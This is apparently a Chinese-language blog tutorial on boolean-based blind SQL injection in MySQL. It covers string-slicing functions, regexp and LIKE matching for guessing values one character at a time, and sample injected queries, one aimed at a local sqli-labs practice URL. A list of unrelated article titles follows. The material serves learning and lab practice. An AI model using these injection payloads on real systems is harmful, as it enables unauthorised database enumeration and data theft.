盲注----基于布尔的SQL盲注
构造逻辑判断
常用字符串截取函数http://www.cnblogs.com/yyccww/p/6054569.html
常用函数
left(a,b) 从左侧截取a的前b位
right(a,b) 从右侧截取a的前b位
substr(a,b,c) 从b位置,将字符串a截取c的长度
mid(a,b,c) 从b位置,将字符串a截取c的长度
ascii() 将字符转换为ascii
ord()同ascii()一样
repexp正则注入
用法select user() regexp '^[a-z]'
第二位可以用select user() regexp '^ro'
当正确的时候显示结果为1,不正确的是时候结果为0
select * from users where id=1 and 1=(if((user() regexp '^r'),1,0))
select * from users where id=1 and 1=(user() regexp '^r')
^是从开头进行匹配,$是从结尾开始匹配
详细信息http://www.cnblogs.com/yyccww/p/6054579.html
通过if语句的条件判断,返回一些条件句,比如if构造一个判断.根据返回结果是否等于0或者等于1进行判断
select * from users where id=1
and 1=(select 1 from
information_schema.tables
where table_schema='secrity' and
table_name regexp '^us[a-z]' limit 0,1)
like匹配注入
和上述的正则类似,mysql在匹配的时候我们可以用like进行匹配
用法 select user() like 'ro%'
http://127.0.0.1/sqli/Less-5/?id=1' and user() like 'eo%'--+
最新文章
- Spring cookie 实战
- 通过接口实现JAVA和.NET互调用-JNInterface
- SpringMVC操作指南-整合Spring、SpringMVC、MyBatis、Log4j/Log4j2及JUnit4搭建项目框架
- Day 6
- Ubuntu 下安装 MySQL Workbench
- [20130704] Intra-Query Parallel Thread Deadlocks
- jQuery 中 attr() 和 prop() 方法的区别
- linux下定时任务的使用
- Java笔记(八)……数组
- DISC免费性格测试题
- Java-工厂设计模式
- 根据子级ID获取其所有父级
- OD: Big_Endian vs Little_Endian
- Windows Server 2003 安装Sql Server 2005 问题处理
- Maven+Spring
- MongDB PHP7
- iOS开发之一:入门介绍
- TypeError: unsupported operand type(s) for +: 'float' and 'decimal.Decimal'
- BZOJ4300:绝世好题(DP)
- 三次握手---TCP/IP